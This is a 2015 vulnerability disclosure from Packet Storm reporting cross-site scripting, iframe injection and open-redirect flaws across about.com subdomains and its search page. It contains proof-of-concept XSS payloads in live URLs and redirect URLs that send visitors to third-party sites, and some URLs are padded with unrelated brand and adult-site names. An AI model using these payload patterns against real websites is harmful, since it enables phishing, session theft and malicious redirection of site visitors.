About.com Cross Site Scripting

2015-02-02T00:00:00
ID PACKETSTORM:130211
Type packetstorm
Reporter Jing Wang
Modified 2015-02-02T00:00:00

Description

                                        
                                            `*About Group (about.com <http://about.com>) All Topics (At least 99.88%  
links) Vulnerable to XSS & Iframe Injection Security Attacks, About.com  
Open Redirect Security Vulnerabilities*  
  
  
  
  
*Vulnerability Description:*  
About.com all "topic sites" are vulnerable to XSS (Cross-Site Scripting)  
and Iframe Injection (Cross Frame Scripting) attacks. This means all  
sub-domains of about.com are affected. Based on a self-written program,  
94357 links were tested. Only 118 links do not belong to the topics  
(Metasites) links. Meanwhile, some about.com main pages are vulnerable to  
XSS attack, too. This means no more than 0.125% links are not affected. At  
least 99.875% links of About Group are vulnerable to XSS and Iframe  
Injection attacks. In fact, for about.com's structure, the main domain is  
something just like a cover. So, very few links belong to them.  
  
Simultaneously, the About.com main page's search field is vulnerable to XSS  
attacks, too. This means all domains related to about.com are vulnerable to  
XSS attacks.  
  
For the Iframe Injection vulnerability. They can be used to do DOS  
(Denial-of-Service Attack) to other websites, too.  
  
In the last, some "Open Redirect" vulnerabilities related to about.com are  
introduced. There may be large number of other Open Redirect  
Vulnerabilities not detected. Since About.com are trusted by some the other  
websites. Those vulnerabilities can be used to do "Covert Redirect" to  
these websites.  
  
  
  
  
  
*Vulnerability Disclosure:*  
Those vulnerabilities were reported to About on Sunday, Oct 19, 2014. No  
one replied. Until now, they are still unpatched.  
  
  
  
  
  
*Vulnerability Discover:*  
Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and  
Mathematical Sciences (SPMS), Nanyang Technological University (NTU),  
Singapore.  
http://www.tetraph.com/wangjing  
  
  
  
  
  
  
*(1) Some Basic Background*  
  
*(1.1) Domain Description:*  
http://www.about.com/  
  
"For March 2014, 61,428,000 unique visitors were registered by comScore for  
About.com, making it the 16th-most-visited online property for that month."  
(The New York Times)  
  
"About.com, also known as The About Group (formerly About Inc.), is an  
Internet-based network of content that publishes articles and videos about  
various subjects on its "topic sites," of which there are nearly 1,000. The  
website competes with other online resource sites and encyclopedias,  
including those of the Wikimedia Foundation" (Wikipedia)  
  
"As of May 2013, About.com was receiving about 84 million unique monthly  
visitors." (TechCrunch. AOL Inc.)  
  
"According to About's online media kit, nearly 1,000 "Experts" (freelance  
writers) contribute to the site by writing on various topics, including  
healthcare and travel." (About.com)  
  
  
  
  
*(1.2) Topics Related to About.com*  
"The Revolutionary About.com Directory and Community Metasite. Hundreds of  
real live passionate Guides covering Arts, Entertainment, Business,  
Industry, Science, Technology, Culture, Health, Fitness, Games,Travel,  
News, Careers, Jobs, Sports, Recreation, Parenting, Kids, Teens, Moms,  
Education, Computers, Hobbies and Local Information." (azlist.about.com)  
  
About.com - Sites A to Z  
Number of Topics  
A: 66  
B: 61  
C: 118  
D: 49  
E: 33  
F: 57  
G: 39  
H: 48  
I: 32  
J: 15  
K: 13  
L: 36  
M: 70  
N: 26  
O: 23  
P: 91  
Q: 4  
R: 32  
S: 104  
T: 47  
U: 12  
V: 9  
W: 43  
X: 1  
Y: 4  
Z: 1  
SUM: 1039  
  
Reference:  
azlist.about.com/  
  
In fact, those are not all topics of about.com. Some of the topics are not  
listed here such as,  
http://specialchildren.about.com  
  
So, there are more than 1000 topics related to about.com  
  
  
  
  
  
*(1.3) Result of Exploiting XSS Attacks*  
"Exploited XSS is commonly used to achieve the following malicious results  
Identity theft  
Accessing sensitive or restricted information  
Gaining free access to otherwise paid for content  
Spying on user’s web browsing habits  
Altering browser functionality  
Public defamation of an individual or corporation  
Web application defacement  
Denial of Service attacks (DOS)  
" (Acunetix)  
  
  
  
  
  
  
*(1.4) Basics of Iframe Injection (Cross-frame-Scripting) Vulnerabilities*  
"In an XFS (Cross-frame-Scripting) attack, the attacker exploits a specific  
cross-frame-scripting bug in a web browser to access private data on a  
third-party website. The attacker induces the browser user to navigate to a  
web page the attacker controls; the attacker's page loads a third-party  
page in an HTML frame; and then JavaScript executing in the attacker's page  
steals data from the third-party page." (OWASP)  
  
"XFS also sometimes is used to describe an XSS attack which uses an HTML  
frame in the attack. For example, an attacker might exploit a Cross Site  
Scripting Flaw to inject a frame into a third-party web page; or an  
attacker might create a page which uses a frame to load a third-party page  
with an XSS flaw." (OWASP)  
  
  
  
  
  
  
*(1.5) Basic of Open Redirect (Dest Redirect Privilege Escalation)  
Vulnerabilities*  
"An open redirect is an application that takes a parameter and redirects a  
user to the parameter value without any validation. This vulnerability is  
used in phishing attacks to get users to visit malicious sites without  
realizing it." (OWASP)  
  
Open redirect is listed in OWASP top 10. The general consensus of it is  
"avoiding such flaws is extremely important, as they are a favorite target  
of phishers trying to gain the user's trust."  
  
  
  
  
  
  
  
*(2) About Group About.com All Topics (At least 99.88% links) Vulnerable to  
XSS (Cross-Site Scripting) Security Attacks*  
  
  
  
*Vulnerability description:*  
  
A method was found to attack users of About.com based XSS attacks.  
  
All links under the topics of about.com can be used for this attack.  
  
Just attach "/lr/" to any About.com's sub-domains. Then attach "any codes +  
sciript" or attach "script" code directly is OK. The structure is "  
http://subdomain.about.com/lr/*/script_code".  
  
  
The vulnerability can be attacked without user login. Tests were performed  
on Mozilla Firefox (26.0) in Ubuntu (14.04) and Microsoft IE (9.0.15) in  
Windows 7.  
  
  
  
*POC Codes, e.g.*  
/"><svg/onload=alert(/justqdjing/)>  
http://ipod.about.com/lr/ipad_how-tos/9033"><svg/onload=alert(/justqdjing/)>  
http://bizfinance.about.com/lr/businesscredit/fl/5-Ways-to-Start-Establishing-Business-Identity-Theft-Protection.htm/  
"><svg/onload=alert(/justqdjing/)>  
http://recycling.about.com/lr/Collecting/ss/EPS-Recycling-5-Reasons-Why-and-2-Why-Not.htm/  
"><svg/onload=alert(/justqdjing/)>  
http://dc.about.com/lr/shopping/a/BlkFriday.htm/  
"><svg/onload=alert(/justqdjing/)>  
http://healthtech.about.com/lr/Patient-Portals/fl/5-Ways-a-Patient-Portal-Can-Improve-Your-Health-Care-Experience.htm/  
"><svg/onload=alert(/justqdjing/)>  
  
  
  
  
*POC Video:*  
https://www.youtube.com/watch?v=h5yELiJBxWo&feature=youtu.be  
  
*Blog Detail:*  
http://securityrelated.blogspot.com/2015/02/about-group-aboutcom-all-topics-at_2.html  
http://tetraph.com/security/xss-vulnerability/about-group-about-com-all-topics-at-least-99-88-links-vulnerable-to-xss-cross-site-scripting-security-attacks/  
  
  
  
  
  
  
  
*(3) About Group About.com Main Page's Search Field XSS (Cross-Site  
Scripting) Security Vulnerabilities*  
  
  
*Vulnerability description:*  
  
About Group has a security problem. It can be exploited by XSS (cross site  
scripting) attacks.  
  
The vulnerability occurs at about.com main page's search field, e.g.  
http://www.about.com/?q=googleandroidsystem  
  
  
*POC Codes, e.g.*  
"--/>"><img src=x onerror=prompt(/tetraph/)>  
http://www.about.com/?q="--/>"><img src=x onerror=prompt(/tetraph/)>  
  
  
  
  
*POC Video:*  
https://www.youtube.com/watch?v=H4G7b_Jkqvw&feature=youtu.be  
  
*Blog Details:*  
http://tetraph.com/security/xss-vulnerability/about-group-about-com-main-pages-search-field-xss-cross-site-scripting-security-vulnerabilities/  
http://securitypitch.com/about-group-about-com-content-network-vulnerable-to-xss-iframe-injection-security-attacks-433/  
http://securityrelated.blogspot.com/2015/02/about-group-aboutcom-main-pages-search.html  
  
  
  
  
  
  
*(4) About Group About.com All Topics (At least 99.88% links) Vulnerable to  
Iframe Injection (Cross Frame Scripting) Security Attacks*  
  
  
  
*Vulnerability description:*  
About Group has a security problem. It can be exploited by Iframe Injection  
(Cross Frame Scripting) attacks.  
  
  
The vulnerability occurs at about.com "offsite.htm" page with "zu"  
parameter, e.g.  
http://internationalinvest.about.com/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//facebook.com/yahoo  
  
Use "http://whitehatpost.blog.163.com/" for the following test.  
  
The vulnerabilities can be attacked without user login. Tests were  
performed on Microsoft IE (10.0.9200.16750) of Windows 8, Mozilla Firefox  
(34.0) & Google Chromium 39.0.2171.65-0 ubuntu0.14.04.1.1064 (64-bit) of  
Ubuntu (14.04),Apple Safari 6.1.6 of Mac OS X Lion 10.7.  
  
  
  
  
  
*Vulnerable URLs:*  
http://homerenovations.about.com/od/fundingyourrenovation/tp/8-Remodels-That-Maximize-Curb-Appeal-For-Higher-Selling-Price.htm  
http://publishing.about.com/od/Childrens-and-YA-Books/fl/A-Literary-linkedin-Agents-ebay-Advice-Hao123-to-Childrens-and-Bing-Sohu-YA-Dailymail-Authors-Snapdeal.htm  
http://chinesefood.about.com/od/chickenrecipes/tp/chicken-stir-fry-flipkart-adobe-alipay-pork-dropbox-blogger-github-jd-chinadaily-huffingtonpost-Livedoor-Buzzfeed-Themeforest-Godaddy.htm  
http://menshair.about.com/od/facialhair/qt/growbeard-ask-360cn-mailru-gmw-googleleadservices-bbc-pornhub-peoplecn-rakuten-nicovideo-dailymotion-1-dmm-deviantart.htm/  
http://jobsearch.about.com/od/coverletters/a/types-sogou-outbrain-booking-chase-pixnet-reddit-pinterest-vk-msn-imdb-of-cover-qq-letters-bankofamerica-twitter-Wikia-Etsy.htm  
http://testprep.about.com/od/The-Redesigned-PSAT/fl/Redesigned-PSAT-101-Flickr-Globo-Xnxx-Tudou-Yelp-Douban-Ameblo-33-Vimeo-Ettoday-Redtube-Directrev-Salesforce-Coccoc.htm  
  
  
*POC:*  
http://internationalinvest.about.com/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//itinfotechnology.wordpress.com  
http://inventors.about.com/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//itinfotechnology.wordpress.com  
http://sbinformation.about.com/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//tetraph.com/security  
http://ancienthistory.about.com/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//inzeed.com/security  
http://specialchildren.about.com/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//diebiyi.com/security  
http://womenshistory.about.com//gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//diebiyi.com/security  
http://budgetdecorating.about.com/o/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//diebiyi.com/security  
http://makeup.about.com//gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//diebiyi.com/security  
http://fictionwriting.about.com//gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//diebiyi.com/security  
  
  
  
  
*POC Video:*  
https://www.youtube.com/watch?v=hx_sdDmSkg0&feature=youtu.be  
  
*Blog Details:*  
http://tetraph.com/security/iframe-injection/about-group-about-com-all-topics-at-least-99-88-links-vulnerable-to-iframe-injection-cross-frame-scripting-security-attacks/  
http://securitypitch.com/about-group-about-com-content-network-vulnerable-to-xss-iframe-injection-security-attacks-433/  
http://securityrelated.blogspot.com/2015/02/about-group-aboutcom-all-topics-at.html  
  
  
  
  
  
  
  
  
  
*(5) About (about.com <http://about.com>) Open Redirect Multiple (Dest  
Redirect Privilege Escalation) Security Vulnerabilities*  
  
  
The vulnerabilities can be attacked without user login. Tests were  
performed on Microsoft IE (10.0.9200.16750) of Windows 8, Mozilla Firefox  
(34.0) & Google Chromium 39.0.2171.65-0 ubuntu0.14.04.1.1064 (64-bit) of  
Ubuntu (14.04),Apple Safari 6.1.6 of Mac OS X Lion 10.7.  
  
  
Use one of webpages for the following tests. The webpage address is "  
http://www.inzeed.com/kaleidoscope/". Suppose that this webpage is  
malicious.  
  
  
  
  
*Vulnerable URL 1:*  
  
http://www.about.com/snf.htm?u=http://www.instagram.com/facebook/craigslist  
  
*POC:*  
http://www.about.com/snf.htm?u=http://www.inzeed.com/essayjeans/poems/thatday.html  
  
  
  
  
*Vulnerable URL 2:*  
http://clk.about.com/?zi=13/1tO&ity=boostOrg&o=0&eng=boost&zu=http://paypal.com/imgur/xinhuanet  
  
*POC:*  
http://clk.about.com/?zi=13/1tO&ity=boostOrg&o=0&eng=boost&zu=http://www.inzeed.com/netflix/stackoverflow  
  
  
  
  
*Vulnerable URL 3:*  
http://wzus1.index.about.com/r?t=v&d=im&u=http%3A%2F%2Ft.co%2fxvideos%2fsoso%2f%naver%2fkickass.so  
  
*POC:*  
http://wzus1.index.about.com/r?t=v&d=im&u=http://www.diebiyi.com/xhamster/diply/onclickads.net  
  
  
  
  
  
  
*POC Video:*  
https://www.youtube.com/watch?v=8ZCUAJ44FsU&feature=youtu.be  
  
*Blog Details:*  
http://tetraph.com/security/open-redirect/about-about-com-open-redirect-multiple-dest-redirect-privilege-escalation-security-vulnerabilities/  
http://securityrelated.blogspot.com/2015/02/about-aboutcom-unvalidated-redirects.html  
  
  
  
  
  
  
  
*Blog Details:*  
http://securityrelated.blogspot.com/2015/02/about-group-aboutcom-all-topics-at_37.html  
http://tetraph.com/security/xss-vulnerability/about-group-about-com-all-topics-at-least-99-88-links-vulnerable-to-xss-iframe-injection-security-attacks-about-com-open-redirect-security-vulnerabilities/  
  
  
  
  
  
--  
Wang Jing,  
Division of Mathematical Sciences (MAS),  
School of Physical and Mathematical Sciences (SPMS),  
Nanyang Technological University (NTU),  
Singapore.  
http://www.tetraph.com/wangjing/  
  
  
`